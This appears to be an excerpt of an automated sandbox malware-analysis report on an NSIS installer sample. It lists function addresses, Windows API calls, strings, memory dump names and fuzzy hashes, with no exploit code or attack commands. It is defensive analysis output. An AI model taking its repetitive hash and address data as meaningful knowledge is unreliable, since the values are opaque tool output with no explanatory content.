SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0

Strings

f, xrefs: 00404EAC

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(00009E00,00000064,000AD530), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

Function 00404D4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
wsprintfW.USER32 ref: 00404DF7
SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A

Strings

%u.%u%s%s, xrefs: 00404DD8

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8

Function 00405DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004034E9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004034E9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
lstrcatW.KERNEL32(?,0040A014), ref: 00405E12

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DF0

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C

Function 00405EF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E

Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405EA9
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6

lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405F51
GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F61

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405EF8

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 3248276644-2382934351
Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE

Function 0040551A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405549
CallWindowProcW.USER32(?,?,?,?), ref: 0040559A

Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE

Strings

, xrefs: 0040552A

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69

Function 004063EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406660,80000002), ref: 00406435
RegCloseKey.ADVAPI32(?), ref: 00406440

Strings

: Completed, xrefs: 004063F6

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
